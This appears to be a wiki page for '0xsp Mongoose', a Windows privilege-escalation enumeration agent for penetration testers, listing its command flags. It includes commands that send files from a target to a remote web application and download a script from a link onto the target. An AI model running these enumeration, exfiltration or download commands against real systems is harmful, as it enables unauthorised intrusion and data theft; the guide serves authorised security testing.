Skip to content

Mongoose Windows Agent Guide

Lawrence Amer edited this page Aug 19, 2019 · 16 revisions

by using mongoose windows privilege escalation enumeration toolkit . you will discover so many features through enumeration process that's make it Helpful for your pentesting tasks . 0xsp Mongoose is built using Lazarus free Pascal , source code has been released with related instructions for successful compilation.
with 0xsp Mongoose you can start two types of scans , one is Solo scan without exporting results into web application api or Advanced scan to transfer these results into web application interface .

The usage of Advanced Scan is by typing -o SITEORIP -x SECRETKEY With any Scan you perform,Mongoose then will export all output results into 0xsp web application .

Banner information

While first executing Mongoose will help you to detect if the target is vulnerable to a common windows kernel exploit rotten potato . with system information and status of powershell Quickly .

User information

Retrieving user information for security purposes through mongoose by typing -u to start the task immediately.all information regarding roles , current permissions , enabled / disabled token privileges , net local users are included on this option .

Services Enumeration

Getting Active Services , and Drivers through executing agent with -s Parameter . Mongoose in all his calls depends on windows kernel API to retrieve these information.

Network Enumeration

By Mongoose you will be able to get all information related to Network Operations and Active connections , active sessions by executing agent with -n parameter

Potential Files

Advanced File Search engine and indexing is built on Mongoose Agent , during Scanning the whole Server mongoose will be able to search for different file extensions at the same time by passing -c parameter .

System information Enumeration

Mongoose agent allow you to start enumerating basic , helpful system information , active login sessions by typing -i

Access Check Enumeration techniques

Mongoose will use two methods to check for current permission . one using icacls and other using builtin function to scan all system for possible write access permission .

Find Specific Keyword on Whole Machine

by mongoose agent you can scan files with specific extensions the whole drivers by passing keyword you would like to pass. to use this function you can type -l {DRIVER} {STRING} {EXTENSION}

Transfer File From Machine

mongoose agent allows you to transfer any file into 0xsp web application Download center , tester is able to easily get any file into 0xsp web application to download it later on or store it on databases .

agent.exe -t API SecretKey

Download files into Machine

mongoose agent allows you to download any file from web or direct link into target machine easily by typing

agent.exe -d http://link/script.ps1 script.ps1